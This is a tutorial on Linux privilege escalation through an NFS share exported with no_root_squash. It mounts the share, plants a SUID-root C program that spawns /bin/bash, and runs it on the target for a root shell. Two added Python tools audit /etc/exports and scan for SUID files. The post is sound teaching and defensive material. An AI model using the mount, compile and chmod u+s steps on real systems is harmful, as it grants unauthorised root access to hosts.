
NFS - Linux Privilege Escalation


Background Information on NFS

NFS stands for Network File System. NFS allows remote hosts to mount file systems over a network and interact with those file systems as though they were mounted locally.

Analogy for NFS: Imagine you are a user sitting in a library (client computer) and you want to read a book that is located on a shelf in a different building (server). Instead of physically going to the other building and retrieving the book, you can request the librarian (NFS protocol) to bring the book to you. The librarian acts as an intermediary, facilitating the retrieval of the book from the remote location and making it accessible to you locally.

The NFS configuration is stored in /etc/exports (view it with `cat /etc/exports`). It is important to note that this file can be read by any user on the server.

Exploiting NFS

The first thing we have to do is look at the NFS configuration to see which directories are shared; then we narrow down our choices by looking for no_root_squash.

What is no_root_squash? no_root_squash allows a remote root user on a remote client to retain their superuser privileges when accessing the shared files. In other words, no_root_squash disables "root squashing".

Then what is root squashing? Root squashing prevents a remote root user from retaining their superuser privileges; basically, they are treated as an ordinary user. Let's say you are a celebrity, but in your parents' eyes you're just their kid, and they treat you the same way they did when you were born. That's what root squashing is like.
Now that we have found a shared directory with no_root_squash, we need to enumerate (gather information on) which shares are mountable. To do this we can use the command `showmount -e TARGET_IP`.
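The dangerous setting above can be found by reading /etc/exports the same way an administrator would audit it. The following is an added example (not code from the original post): a small Python parser for the exports(5) syntax that flags every (path, client) pair exported with no_root_squash or to the world, and prints a rewrite with root squashing enforced. The SAMPLE_EXPORTS contents are constructed for the example and are not from any real host. It also goes beyond the post in one respect: it catches the classic mistake of writing `host (opts)` with a space, which exports those options to every host.

```python
"""Audit an /etc/exports file for shares that drop root squashing.

Added example (not from the original post): parses the exports(5) syntax
and flags the settings the post describes as dangerous. SAMPLE_EXPORTS is a
constructed file, not taken from any real host.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

SAMPLE_EXPORTS = """\
# constructed sample /etc/exports
/tmp            *(rw,sync,no_root_squash)
/srv/share      10.10.0.0/24(rw,sync,root_squash)
/srv/public     10.10.0.5(ro,sync) 10.10.0.6(ro,sync)
/home/backup    192.168.1.10 (rw,no_root_squash)
"""


@dataclass
class Export:
    path: str
    client: str
    options: List[str]


# "client(opt,opt)" or bare "client"; the parentheses part is optional.
SPEC_RE = re.compile(r'([^(]*)(?:\((.*)\))?')


def parse_exports(text: str) -> List[Export]:
    """Return one Export per (path, client) pair in an exports file."""
    exports = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()    # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = SPEC_RE.fullmatch(spec)
            if m is None:
                continue                        # malformed spec; skip it
            client, opts = m.group(1), m.group(2) or ''
            # exports(5): "host (opts)" with a space leaves "(opts)" with an
            # empty client, which exports those options to every host.
            if client == '':
                client = '*'
            exports.append(Export(path, client, [o for o in opts.split(',') if o]))
    return exports


def audit(exports: List[Export]) -> List[Tuple[str, str, str]]:
    """Return (path, client, issue) findings for risky exports."""
    findings = []
    for e in exports:
        if 'no_root_squash' in e.options:
            findings.append((e.path, e.client, 'no_root_squash'))
        if e.client == '*':
            findings.append((e.path, e.client, 'world_export'))
    return findings


def hardened_line(e: Export) -> str:
    """Rewrite one export line with root squashing enforced."""
    opts = ['root_squash' if o == 'no_root_squash' else o for o in e.options]
    if 'root_squash' not in opts:
        opts.append('root_squash')
    return f"{e.path} {e.client}({','.join(opts)})"


if __name__ == '__main__':
    exports = parse_exports(SAMPLE_EXPORTS)
    for path, client, issue in audit(exports):
        print(f"{issue:15} {path} -> {client}")
    print("\nsuggested rewrite:")
    for e in exports:
        print(hardened_line(e))
```

Run it against a real file with `parse_exports(open('/etc/exports').read())`; after editing the file, `exportfs -ra` reloads the export table. The rewrite only fixes root squashing; narrowing a `*` client list to specific hosts or subnets is a decision the administrator has to make.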

For this explanation, I will mount to the /tmp directory. First, let's create a folder in the /tmp directory on our attacker machine.
Now we will mount one of the shares from the target to the directory we just created. I'm going to use this command: `mount -o rw TARGET_IP:/SHARE_NAME /FOLDER_TO_MOUNT_IT`. I'm going to choose the /tmp share. My command would be `mount -o rw 10.10.149.95:/tmp /tmp/ATTACK_MACHINE`.

Now, let's go inside the ATTACK_MACHINE folder. To test whether the folder is really mounted (shared), we can create a file named new and see if it appears on our victim machine. To do this we are going to use the touch command: `touch new.c`. As you can see from the picture, both directories are in sync.

Now that our two directories are in sync, it's time to do the evil stuff :) We will edit our new file from our "Attacker Machine" and put in the following lines:

```c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

int main()
{
    setgid(0);            /* switch to group root */
    setuid(0);            /* switch to user root; allowed because the file is SUID root */
    system("/bin/bash");  /* spawn a shell with those privileges */
    return 0;
}
```

Note: Please make sure that new has the .c extension, so it would be new.c.
Now we're cooking. Let's compile our code using `gcc new.c -o new -w` and then assign it a SUID bit. Let's review what a SUID bit is, shall we?

SUID bit

The SUID bit is denoted as "s". It is also known as Set owner User ID. SUID allows the user running a file to inherit the privileges of the file's owner. For example, if the owner of the file is root, the user will get root privileges. If the owner of the file is a specific user, then the user will get the privileges of that specific user.
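Because a SUID-root file is what this technique leaves behind on the target, checking for unexpected SUID files is the natural way to detect it. The following is an added example (not code from the original post): a Python equivalent of `find ROOT -type f -perm -4000`, together with a constructed temporary tree containing one SUID file and one plain file so it runs stand-alone. The file names and contents are made up; nothing is executed.

```python
"""Find SUID files the way a defender would after an NFS share is abused.

Added example (not from the original post): a scanner equivalent to
`find ROOT -type f -perm -4000`, plus a constructed sample tree.
"""
import os
import shutil
import stat
import tempfile
from typing import List, Optional, Tuple


def find_setuid_files(root: str, owner_uid: Optional[int] = None) -> List[str]:
    """Return regular files under `root` whose set-user-ID bit is set.

    With owner_uid=0 only SUID-root files are reported, which is what the
    chmod u+s step in the post produces on the target's share."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not (st.st_mode & stat.S_ISUID):
                continue
            if owner_uid is not None and st.st_uid != owner_uid:
                continue
            hits.append(path)
    return sorted(hits)


def mode_string(mode: int) -> str:
    """ls -l style mode string; a SUID file shows 's' in the owner execute slot."""
    return stat.filemode(mode)


def demo() -> Tuple[str, List[str]]:
    """Build a constructed tree with one SUID file and one plain file, scan it,
    and return (path of the SUID file, scanner output)."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    suid_path = os.path.join(base, "new")
    plain_path = os.path.join(base, "notes.txt")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("constructed sample, not a real binary\n")
    os.chmod(suid_path, 0o4755)    # same result as chmod 755 followed by chmod u+s
    os.chmod(plain_path, 0o644)
    try:
        return suid_path, find_setuid_files(base)
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    suid_path, hits = demo()
    print("SUID files found:", hits)
    print("mode of a 4755 regular file:", mode_string(0o104755))
```

On a real system, run `find_setuid_files('/', owner_uid=0)` and compare the result with a known-good baseline; a new SUID-root file inside an exported directory such as /tmp is exactly the artifact this write-up creates.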

Back to the Program

Now that we have reviewed what a SUID bit is, let's continue where we left off. The next thing we are going to do is assign the SUID bit to new. To do that we are going to use this command: `chmod u+s new`. If you run `ls -al` again, you will see the SUID bit assigned to new.

Now, let's go back to our target machine and run new.

There you go, we got root privileges.

That’s all, thank you for reading.